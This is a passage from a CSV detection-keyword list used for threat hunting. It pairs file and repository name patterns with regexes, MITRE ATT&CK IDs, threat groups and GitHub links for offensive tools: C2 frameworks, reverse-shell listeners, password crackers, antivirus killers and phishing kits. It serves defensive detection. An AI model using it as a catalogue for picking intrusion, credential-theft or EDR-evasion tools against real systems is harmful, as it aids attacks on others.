- Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","85","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*bin/dll/merlin.c*",".{0,1000}bin\/dll\/merlin\.c.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*bin/icmpsh/*",".{0,1000}bin\/icmpsh\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*bin/iodine*",".{0,1000}bin\/iodine.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*bin/ldd2pretty*",".{0,1000}bin\/ldd2pretty.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*bin/ligolo*",".{0,1000}bin\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*bin/localrelay*",".{0,1000}bin\/localrelay.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*bin/masscan*",".{0,1000}bin\/masscan.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*bin/merlinAgent*",".{0,1000}bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*bin/PELoader.exe*",".{0,1000}bin\/PELoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*bin/setoolkit*",".{0,1000}bin\/setoolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","10238","2645","2023-12-21T20:10:33Z","2012-12-31T22:01:33Z" "*bin/setuserpass.x64*",".{0,1000}bin\/setuserpass\.x64.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*bin/SillyRAT/*",".{0,1000}bin\/SillyRAT\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*bin/stardust.x64.bin*",".{0,1000}bin\/stardust\.x64\.bin.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*bin/striker*",".{0,1000}bin\/striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*bin/void.zip*",".{0,1000}bin\/void\.zip.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Bin\bin32\zlibwapi.dll*",".{0,1000}Bin\\bin32\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Bin\bin64\zlibwapi.dll*",".{0,1000}Bin\\bin64\\zlibwapi\.dll.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*bin\psexec_command.x64.o*",".{0,1000}bin\\psexec_command\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*bin\SillyRAT*",".{0,1000}bin\\SillyRAT.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*bin\void.zip*",".{0,1000}bin\\void\.zip.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*bin2mac.py *.bin*",".{0,1000}bin2mac\.py\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*binderlabs/DirCreate2System*",".{0,1000}binderlabs\/DirCreate2System.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*binderlabs/DirCreate2System*",".{0,1000}binderlabs\/DirCreate2System.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*binwalk -e image.png*",".{0,1000}binwalk\s\-e\simage\.png.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*BishopFox/sliver*",".{0,1000}BishopFox\/sliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*bitb_server/phishing.ini*",".{0,1000}bitb_server\/phishing\.ini.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2726","467","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z" "*bitcoin2john.py*",".{0,1000}bitcoin2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Bitmap-Elevate*",".{0,1000}Bitmap\-Elevate.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*bitquark_top100k_sublist.txt*",".{0,1000}bitquark_top100k_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*bits_ntlm_token_impersonation.*",".{0,1000}bits_ntlm_token_impersonation\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bitsadmin/nopowershell*",".{0,1000}bitsadmin\/nopowershell.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*BitsadminStager*",".{0,1000}BitsadminStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bitshares2john.py*",".{0,1000}bitshares2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*bitwarden2john.py*",".{0,1000}bitwarden2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Biu-framework*",".{0,1000}Biu\-framework.{0,1000}","offensive_tool_keyword","Biu-framework","Biu-framework Security Scan Framework For Enterprise Intranet Based Services","T1590 - T1591 - T1592 - T1593 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Frameworks","https://awesomeopensource.com/project/0xbug/Biu-framework","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bkerberos_ccache_use*",".{0,1000}bkerberos_ccache_use.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bkerberos_ticket_purge*",".{0,1000}bkerberos_ticket_purge.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bkerberos_ticket_use*",".{0,1000}bkerberos_ticket_use.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bkeylogger*",".{0,1000}bkeylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*bks2john.py*",".{0,1000}bks2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*blackarch/tree/master/packages/rustcat*",".{0,1000}blackarch\/tree\/master\/packages\/rustcat.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*blackarrowsec/mssqlproxy*",".{0,1000}blackarrowsec\/mssqlproxy.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","8","704","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*blackarrowsec/pivotnacci*",".{0,1000}blackarrowsec\/pivotnacci.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*blackhat-arsenal-tools*",".{0,1000}blackhat\-arsenal\-tools.{0,1000}","offensive_tool_keyword","Github Username","This github account maps to the Black Hat Arsenal tools since its inception in 2011. For readibility. the tools are classified by category and not by session.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/toolswatch/blackhat-arsenal-tools","1","0","N/A","N/A","10","3725","1124","2023-10-11T11:20:59Z","2017-07-21T08:03:44Z" "*blacklanternsecurity/MANSPIDER*",".{0,1000}blacklanternsecurity\/MANSPIDER.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*blacklanternsecurity/trevorproxy*",".{0,1000}blacklanternsecurity\/trevorproxy.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*blacklanternsecurity/TREVORspray*",".{0,1000}blacklanternsecurity\/TREVORspray.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*Blackout.exe *",".{0,1000}Blackout\.exe\s.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*BlackSnufkin/GhostDriver*",".{0,1000}BlackSnufkin\/GhostDriver.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*BlackSnufkin/NovaLdr*",".{0,1000}BlackSnufkin\/NovaLdr.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*ble_recon.go*",".{0,1000}ble_recon\.go.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*blendin/3snake*",".{0,1000}blendin\/3snake.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*blindSQLPayloads.txt*",".{0,1000}blindSQLPayloads\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*blitz /* */etc/*",".{0,1000}blitz\s\/.{0,1000}\s.{0,1000}\/etc\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - 